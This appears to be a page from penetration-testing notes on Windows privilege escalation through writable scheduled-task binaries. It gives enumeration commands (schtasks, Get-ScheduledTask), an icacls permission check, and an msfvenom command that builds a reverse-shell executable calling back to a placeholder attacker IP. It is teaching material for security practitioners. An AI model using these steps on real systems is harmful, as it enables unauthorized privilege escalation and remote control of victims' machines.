Scheduled Tasks

Rare Vector

Detection

# Generally backup files otherwise lots of noise

schtasks /query /fo LIST /v
# Look in Author, TaskName, Task To Run, Run As User, and Next Run Time fields.

OR

# PowerShell
Get-ScheduledTask | ft TaskName,TaskPath,State
Get-ScheduledTask | where {$_.TaskPath -notlike  "\Microsoft*"} | ft TaskName,TaskPath,State

Exploitation

1) icacls <file.exe> # Do we have M or F on BUILTIN/USERS or Username?
2) Replace the file directly with adduser.exe or msfvenom shell
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<> -f exe -o Common.exe
PreviousUnquoted Service PathNextAlwaysInstallElevated

Last updated